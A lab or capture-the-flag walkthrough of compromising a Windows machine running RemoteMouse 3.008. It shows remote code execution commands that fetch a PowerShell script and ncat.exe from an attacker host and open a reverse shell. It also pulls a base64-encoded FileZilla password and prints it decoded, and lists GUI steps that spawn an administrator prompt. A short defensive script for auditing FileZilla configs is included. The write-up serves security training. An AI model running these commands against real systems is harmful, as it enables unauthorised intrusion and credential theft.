Machine Info

This lab demonstrates exploiting RemoteMouse 3.008 to achieve remote code execution via a modified exploit that delivers a reverse shell. Learners will escalate privileges by extracting and decoding credentials from FileZilla’s configuration files, gaining RDP access as a user. Finally, they will exploit the RemoteMouse application’s admin privileges to spawn a Command Prompt as Administrator. This lab emphasizes RCE, credential exploitation, and leveraging application misconfigurations for privilege escalation.

User

Reconnaissance

We are going to start by running our nmap scan:

ports=$(nmap -p- --min-rate=1000 -T4 $VICTIM | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

└─$ nmap -p$ports -sC -sV $VICTIM
Running second nmap scan with open ports: 1978,1979,1980,3389
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-05 21:27 CET
Nmap scan report for $VICTIM
Host is up (0.033s latency).

PORT     STATE SERVICE        VERSION
1978/tcp open  remotemouse    Emote Remote Mouse
1979/tcp open  unisql-java?
1980/tcp open  pearldoc-xact?
3389/tcp open  ms-wbt-server  Microsoft Terminal Services
|_ssl-date: 2026-03-05T20:30:53+00:00; +14s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Not valid before: 2025-12-02T17:03:21
|_Not valid after:  2026-06-03T17:03:21
| rdp-ntlm-info: 
|   Target_Name: REMOTE-PC
|   NetBIOS_Domain_Name: REMOTE-PC
|   NetBIOS_Computer_Name: REMOTE-PC
|   DNS_Domain_Name: Remote-PC
|   DNS_Computer_Name: Remote-PC
|   Product_Version: 10.0.19041
|_  System_Time: 2026-03-05T20:30:25+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|2019 (92%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Microsoft Windows 10 1903 - 21H1 (92%), Microsoft Windows 10 1909 - 2004 (85%), Windows Server 2019 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

RemoteMouse-3.008

Looking at the open ports, we immediately spot 1978/tcp open remotemouse (Emote Remote Mouse). Looking it up online, we find an RCE vulnerability and a local privilege escalation that requires GUI access, the latter listed as CVE-2021-35448.

We are going to use the RCE PoC from the link above and check whether the target is vulnerable.

Running the command listed in the usage section of the repo, we actually get a hit on our Python web server:

./RemoteMouse-3.008-Exploit.py --target-ip $VICTIM --cmd "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://$ATTACKER/revshell.ps1')\""
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
$VICTIM - - [06/Mar/2026 09:47:27] "GET /revshell.ps1 HTTP/1.1" 200 -

The problem here was that we tried many ports and many different ways to establish a reverse shell. It seems that only outbound connections to ports 80 and 443 are allowed, and even then popular payloads and tools, such as PowerShell reverse shells, didn't work. We tried multiple ones without luck.

So we then tried ncat.exe, which did the trick. We have to transfer the executable to a location on the target that actually exists and then run it from there. As you can see from the sample below, we tried several options; the attempts marked #failed did not produce a shell.

└─$ cd ../RemoteMouse-3.008-Exploit 
                                                                                             
└─$ ls
README.md  RemoteMouse-3.008-Exploit.py  setup
                                                                                             
└─$ python RemoteMouse-3.008-Exploit.py  -t $VICTIM -c 'powershell -c "iwr -uri http://$ATTACKER/ncat.exe -outfile C:\TEMP\ncat.exe' #failed
                                                                                             
└─$ python RemoteMouse-3.008-Exploit.py  -t $VICTIM -c 'powershell -c "iwr -uri http://$ATTACKER/ncat.exe -outfile C:\Windows\TEMP\ncat.exe'
                                                                                             
└─$ python RemoteMouse-3.008-Exploit.py  -t $VICTIM -c 'powershell -c "C:\Windows\TEMP\ncat.exe $ATTACKER 4444 -e powershell' #failed
                                                                                             
└─$ python RemoteMouse-3.008-Exploit.py  -t $VICTIM -c 'powershell -c "C:\Windows\TEMP\ncat.exe $ATTACKER 4444 -e cmd'      #failed
                                                                                             
└─$ python RemoteMouse-3.008-Exploit.py  -t $VICTIM -c 'powershell -c "C:\Windows\TEMP\ncat.exe $ATTACKER 80 -e cmd'  
                                                                 
└─$ rlwrap nc -lnvp 80  
listening on [any] 80 ...
connect to [$ATTACKER] from (UNKNOWN) [$VICTIM] 50202
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.

C:\Users\divine>

At last we got a shell and we can get the local.txt.

Root

FileZilla

Immediately, looking at the user's directory, we spot FileZilla, and under the AppData\Roaming directory we find the recent connection entry with the credentials stored in base64.

PS C:\Users\divine\Appdata\Roaming> cd Filezilla
cd Filezilla
PS C:\Users\divine\Appdata\Roaming\Filezilla> cat recentservers.xml
cat recentservers.xml
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
        <RecentServers>
                <Server>
                        <Host>ftp.pg</Host>
                        <Port>21</Port>
                        <Protocol>0</Protocol>
                        <Type>0</Type>
                        <User>divine</User>
                        <Pass encoding="base64">[BASE64PASSHERE]=</Pass>
                        <Logontype>1</Logontype>
                        <PasvMode>MODE_DEFAULT</PasvMode>
                        <EncodingType>Auto</EncodingType>
                        <BypassProxy>0</BypassProxy>
                </Server>
        </RecentServers>
</FileZilla3>
PS C:\Users\divine\Appdata\Roaming\Filezilla> 
Decoding the base64 value gives the user's password: ControlFreak11
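The recentservers.xml above shows why a FileZilla profile is worth checking in any host review: the saved password is only base64-encoded, not encrypted. The following Python is added here and is not part of the original write-up; it parses a file of that shape and reports each saved server whose credential is persisted on disk. The sample XML, host names and credential are constructed for this example.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample shaped like the recentservers.xml above; the host names
# and the credential are made up for this example, not the lab's real values.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">ZXhhbXBsZS1wYXNzd29yZA==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
      <Logontype>2</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>"""

LOGONTYPES = {"0": "anonymous", "1": "normal (password saved)", "2": "ask"}

def audit_filezilla_config(xml_text):
    """One finding per <Server>; flags entries whose password sits on disk."""
    findings = []
    for server in ET.fromstring(xml_text).iter("Server"):
        pass_el = server.find("Pass")
        secret = None
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                # base64 is encoding, not encryption: anyone who can read the
                # file (e.g. via the user's roaming profile) gets the password.
                secret = base64.b64decode(pass_el.text).decode("utf-8")
            else:
                secret = pass_el.text  # older FileZilla versions wrote it plain
        findings.append({
            "target": f'{server.findtext("User", "")}@{server.findtext("Host", "")}:{server.findtext("Port", "")}',
            "plaintext_protocol": server.findtext("Protocol") == "0",  # 0 = FTP
            "logontype": LOGONTYPES.get(server.findtext("Logontype", ""), "other"),
            "password_stored": secret is not None,
            "password_length": len(secret) if secret else 0,
        })
    return findings
```

Run it against %APPDATA%\FileZilla\recentservers.xml and sitemanager.xml on a host under review; any finding with password_stored set is a credential to rotate, and a plaintext_protocol entry additionally sends it unencrypted on every connection.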

Now we can RDP to the machine which gives us more flexibility and options.

As we said earlier, we had found a local privilege escalation for Remote Mouse, and now that we have GUI access we can try it.

The steps to reproduce are:

  1. Open Remote Mouse from the system tray
  2. Go to “Settings”
  3. Click “Change…” in “Image Transfer Folder” section
  4. “Save As” prompt will appear
  5. Enter “C:\Windows\System32\cmd.exe” in the address bar
  6. A new command prompt is spawned with Administrator privileges

That’s how we achieve SYSTEM access.